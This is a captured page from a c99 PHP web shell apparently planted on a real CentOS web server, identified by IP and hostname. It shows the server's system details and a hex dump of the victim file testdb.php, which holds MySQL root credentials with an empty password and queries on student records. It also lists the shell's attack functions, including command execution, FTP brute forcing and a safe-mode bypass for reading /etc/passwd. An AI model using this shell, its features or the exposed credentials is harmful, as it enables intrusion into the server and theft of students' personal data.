110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/webservice/ drwxr-xr-x Free 52.62 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/webservice/ drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: testdb.php (714 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/webservice/testdb.php
Size	714 B
MD5	82cb7bb09b7af011096eb01668ddc5d7
Owner/Group	root/root
Perms	-rw-r--r--
Create time	06/07/2011 02:00:54
Access time	11/07/2024 13:52:19
MODIFY time	17/03/2008 14:35:41

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8

3C 3F 0D 0A 24 68 6F 73 74 3D 22 6C 6F 63 61 6C 68 6F 73 74 22 3B 0D 0A
24 75 73 65 72 6E 61 6D 65 3D 22 72 6F 6F 74 22 3B 0D 0A 24 70 61 73 73
5F 77 6F 72 64 3D 22 22 3B 0D 0A 24 64 62 3D 22 72 65 67 22 3B 0D 0A 6D
79 73 71 6C 5F 63 6F 6E 6E 65 63 74 28 24 68 6F 73 74 2C 24 75 73 65 72
6E 61 6D 65 2C 24 70 61 73 73 5F 77 6F 72 64 29 20 6F 72 20 64 69 65 20
28 22 B5 D4 B4 B5 E8 CD A1 D1 BA B0 D2 B9 A2 E9 CD C1 D9 C5 20 4D 79 73
71 6C 20 E4 C1 E8 E4 B4 E9 20 22 29 3B 0D 0A 6D 79 73 71 6C 5F 73 65 6C
65 63 74 5F 64 62 28 24 64 62 29 20 6F 72 20 64 69 65 28 22 E0 C5 D7 CD
A1 B0 D2 B9 A2 E9 CD C1 D9 C5 E4 C1 E8 E4 B4 E9 22 29 3B 0D 0A 2F 2F 24
73 71 6C 20 3D 20 22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 73 74 75
64 65 6E 74 2C 66 61 63 75 6C 74 79 2C 64 65 70 61 72 74 6D 65 6E 74 2C
62 72 61 6E 63 68 2C 72 65 6E 74 20 20 20 57 48 45 52 45 20 28 53 74 75
64 65 6E 74 49 44 20 6C 69 6B 65 20 27 25 24 73 74 75 64 65 6E 74 69 64
25 27 29 20 61 6E 64 20 28 73 74 75 64 65 6E 74 2E 62 72 61 6E 5F 63 6F
64 65 3D 62 72 61 6E 63 68 2E 62 72 61 6E 5F 63 6F 64 65 29 20 20 61 6E
64 20 28 73 74 75 64 65 6E 74 2E 53 74 75 64 65 6E 74 49 44 3D 72 65 6E
74 2E 52 65 6E 74 49 44 29 20 4F 52 44 45 52 20 42 59 20 53 74 75 64 65
6E 74 49 44 2C 49 73 72 65 74 75 72 6E 41 6C 6C 22 3B 0D 0A 0D 0A 24 73
71 6C 20 3D 20 22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 53 74 75 64
65 6E 74 4D 61 73 74 65 72 2C 20 53 74 75 64 65 6E 74 42 69 6F 20 20 57
48 45 52 45 20 28 73 74 75 64 65 6E 74 49 64 3D 27 34 39 32 31 30 31 30
30 31 27 29 20 61 6E 64 20 28 53 74 75 64 65 6E 74 4D 61 73 74 65 72 2E
73 74 75 64 65 6E 74 49 64 3D 53 74 75 64 65 6E 74 42 69 6F 2E 73 74 75
64 65 6E 74 49 64 29 22 3B 0D 0A 0D 0A 24 64 62 71 75 65 72 79 20 3D 20
6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 71 6C 29 3B 0D 0A 0D 0A 77 68
69 6C 65 28 24 72 65 73 75 6C 74 3D 20 6D 79 73 71 6C 5F 66 65 74 63 68
5F 61 72 72 61 79 28 24 64 62 71 75 65 72 79 29 29 0D 0A 7B 0D 0A 09 24
69 6E 66 6F 72 6D 61 74 69 6F 6E 3D 20 24 72 65 73 75 6C 74 5B 22 53 74
75 64 65 6E 74 4E 61 6D 65 22 5D 3B 0D 0A 09 65 63 68 6F 20 22 24 69 6E
66 6F 72 6D 61 74 69 6F 6E 22 3B 0D 0A 7D 0D 0A 3F 3E

<?  $host="localhost";
$username="root";  $pass
_word="";  $db="reg";  m
ysql_connect($host,$user
name,$pass_word) or die
("µФґµиНЎСє°Т№ўйНБЩЕ Mys
ql дБидґй ");  mysql_sel
ect_db($db) or die("аЕЧН
Ў°Т№ўйНБЩЕдБидґй");  //$
sql = "SELECT * FROM stu
dent,faculty,department,
branch,rent   WHERE (Stu
dentID like '%$studentid
%') and (student.bran_co
de=branch.bran_code)  an
d (student.StudentID=ren
t.RentID) ORDER BY Stude
ntID,IsreturnAll";    $s
ql = "SELECT * FROM Stud
entMaster, StudentBio  W
HERE (studentId='4921010
01') and (StudentMaster.
studentId=StudentBio.stu
dentId)";    $dbquery =
mysql_query($sql);    wh
ile($result= mysql_fetch
_array($dbquery))  {   $
information= $result["St
udentName"];   echo "$in
formation";  }  ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0101 ]--